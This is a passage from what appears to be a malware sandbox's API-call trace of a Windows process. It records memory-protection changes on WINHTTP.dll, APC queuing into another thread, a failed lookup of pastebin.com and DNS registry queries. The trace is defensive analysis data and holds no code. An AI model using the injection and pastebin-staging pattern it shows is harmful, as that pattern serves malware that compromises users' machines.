10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1180 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1181 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee10bef9e", "parentcaller": "0x7ffee32a6d74", "category": "threading", "api": "NtOpenThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000464" }, { "name": "DesiredAccess", "value": "0x00100010", "pretty_value": "THREAD_SET_CONTEXT|0x00100000" }, { "name": "ProcessId", "value": "3308" }, { "name": "ThreadId", "value": "118879976" } ], "repeated": 0, "id": 1182 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1183 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1184 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "1596", "caller": "0x7ffee32a6aa3", "parentcaller": "0x7ffee34d2dc9", "category": "threading", "api": "NtQueueApcThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessId", "value": "3308" }, { "name": "ThreadId", "value": "3408" }, { "name": "ThreadHandle", "value": "0x00000464" }, { "name": "ApcRoutine", "value": "0x7ffee32aded0" }, { "name": "Module", "value": "sechost.dll" } ], "repeated": 0, "id": 1185 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffee32a8719", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1186 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffee32a8719", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000464" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 1187 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee10db62e", "parentcaller": "0x7ffee32a8746", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "250" } ], "repeated": 0, "id": 1188 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8a5fe9f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000460" } ], "repeated": 0, "id": 1189 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1190 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee338bf07", "parentcaller": "0x7ffee338be66", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1191 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1192 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee10b30ce", "parentcaller": "0x7ffed8a50b26", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000460" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1193 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee347c23a", "parentcaller": "0x7ffee347c30d", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000468" } ], "repeated": 0, "id": 1194 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee347c23a", "parentcaller": "0x7ffee347c30d", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000046c" } ], "repeated": 0, "id": 1195 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8a903e1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000045c" } ], "repeated": 0, "id": 1196 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8a51ba7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000458" } ], "repeated": 0, "id": 1197 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffed8a90fbf", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000460" } ], "repeated": 0, "id": 1198 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee347c23a", "parentcaller": "0x7ffee34c37ea", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000464" } ], "repeated": 0, "id": 1199 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d43000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1200 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee22c2f9c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\mswsock.dll" }, { "name": "BaseAddress", "value": "0x7ffee0260000" } ], "repeated": 1, "id": 1201 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee22d00db", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\DNSAPI" }, { "name": "DllBase", "value": "0x7ffedff90000" } ], "repeated": 0, "id": 1202 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee34d7cc6", "parentcaller": "0x7ffee34addf7", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1203 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffee34d7cc6", "parentcaller": "0x7ffee34addf7", "category": "network", "api": "GetAddrInfoExW", "status": false, "return": "0x000003e5", "arguments": [ { "name": "Name", "value": "pastebin.com" }, { "name": "ServiceName", "value": "" } ], "repeated": 0, "id": 1204 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedffac013", "parentcaller": "0x7ffedff9cb2c", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Class", "value": "Class" }, { "name": "Access", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "Handle", "value": "0x00000490" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1205 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee110026b", "parentcaller": "0x7ffee22cda6a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000498" } ], "repeated": 0, "id": 1206 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x00000000", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1207 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedffac19f", "parentcaller": "0x7ffedff9cb2c", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" }, { "name": "Handle", "value": "0x0000048c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" } ], "repeated": 0, "id": 1208 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedffac1db", "parentcaller": "0x7ffedff9cb2c", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" } ], "repeated": 0, "id": 1209 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x00000000", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "System\\CurrentControlSet\\Services\\DNS" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DNS" } ], "repeated": 0, "id": 1210 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "QueryAdapterName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName" } ], "repeated": 0, "id": 1211 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cee6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "DisableAdapterDomainName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName" } ], "repeated": 0, "id": 1212 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "UseDomainNameDevolution" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution" } ], "repeated": 0, "id": 1213 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "UseDomainNameDevolution" }, { "name": "Data", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution" } ], "repeated": 0, "id": 1214 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DomainNameDevolutionLevel" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel" } ], "repeated": 0, "id": 1215 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "PrioritizeRecordData" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData" } ], "repeated": 0, "id": 1216 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "PrioritizeRecordData" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData" } ], "repeated": 0, "id": 1217 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "AllowUnqualifiedQuery" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery" } ], "repeated": 0, "id": 1218 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "AllowUnqualifiedQuery" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery" } ], "repeated": 0, "id": 1219 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "AppendToMultiLabelName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName" } ], "repeated": 0, "id": 1220 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ScreenBadTlds" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds" } ], "repeated": 0, "id": 1221 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ScreenUnreachableServers" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers" } ], "repeated": 0, "id": 1222 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ScreenDefaultServers" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers" } ], "repeated": 0, "id": 1223 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DynamicServerQueryOrder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder" } ], "repeated": 0, "id": 1224 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "FilterClusterIp" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp" } ], "repeated": 0, "id": 1225 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "WaitForNameErrorOnAll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll" } ], "repeated": 0, "id": 1226 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "UseEdns" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns" } ], "repeated": 0, "id": 1227 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DnsSecureNameQueryFallback" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback" } ], "repeated": 0, "id": 1228 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "EnableDAForAllNetworks" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks" } ], "repeated": 0, "id": 1229 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DirectAccessQueryOrder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder" } ], "repeated": 0, "id": 1230 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "QueryIpMatching" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching" } ], "repeated": 0, "id": 1231 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee10be6a1", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\rasadhlp.dll" }, { "name": "BaseAddress", "value": "0x7ffed87c0000" } ], "repeated": 0, "id": 1232 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee10be6a1", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffed87c0000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\System32\\rasadhlp.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 1233 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "RegistrationTtl" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl" } ], "repeated": 0, "id": 1234 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cee6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "DefaultRegistrationTTL" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL" } ], "repeated": 0, "id": 1235 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "RegistrationRefreshInterval" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval" } ], "repeated": 0, "id": 1236 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cee6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "DefaultRegistrationRefreshInterval" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval" } ], "repeated": 0, "id": 1237 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "RegistrationMaxAddressCount" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount" } ], "repeated": 0, "id": 1238 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cee6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "MaxNumberOfAddressesToRegister" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister" } ], "repeated": 0, "id": 1239 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "UpdateSecurityLevel" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel" } ], "repeated": 0, "id": 1240 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9ce73", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "UpdateSecurityLevel" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel" } ], "repeated": 0, "id": 1241 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "UpdateTopLevelDomainZones" }, { "name": "FullName", "value": 